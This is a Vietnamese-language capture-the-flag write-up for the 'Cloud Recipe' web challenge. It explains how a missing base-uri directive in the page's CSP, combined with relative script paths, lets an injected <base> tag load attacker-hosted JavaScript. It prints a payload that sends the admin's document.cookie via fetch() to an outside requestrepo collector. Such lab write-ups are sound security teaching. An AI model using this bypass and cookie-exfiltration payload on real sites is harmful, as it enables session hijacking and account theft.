Cloud Recipe

0xgnud17 pentester
  2025-04-03 09:50:38 2025-04-03 09:50:38 Created   2026-04-22 09:15:12 2026-04-22 09:15:12 Updated      

Cloud Recipe - web

Author: tan3ora

  • Tên: Cloud Recipe
  • Description: Cloud Recipe is the first website entirely dedicated to keeping your secret recipes safe! Even Nuka Cola trusts us!
  • Link: http://chall.ctf.k1nd4sus.it:31000/
  • Có source code

Phân tích

Trang web có chức năng tạo recipe để lưu trữ và có thể gửi cho admin.
Mục tiêu là bypass được CSP để khai thác XSS lấy cookie của admin.

Check CSP ta có image

Ở đây có thể nghĩ đến 2 hướng : tập trung vào default-src hoặc base-uri. Do trong CSP đã có style-src nên với việc cần khai thác XSS,miss default-src cũng không ảnh hưởng nhiều lắm.

Tập trung vào hướng base-uri,phân tích source code đã cho,phát hiện server dùng đường dẫn tương đối để nhúng file js image
Từ đây có thể chèn url ta tự host qua <base> vào phần <head> để nhúng file js của ta vào và chạy payload javascript.

Khai thác

Dùng requestrepo để host file payload tại /static/js/image.js :

1
2
3
4
var cookieValue = document.cookie;
fetch("https://1e5qhv69.requestrepo.com?flag=" + encodeURIComponent(cookieValue), {
    method: "GET"
})

image

Chèn base-uri qua thẻ meta và gửi cho admin:
image

Decode để lấy flag:
image

Flag: KSUS{0h_n0_m4_l4546n4_r3c1p3}

On this page
Cloud Recipe
  1. Cloud Recipe - web
    1. Phân tích
    2. Khai thác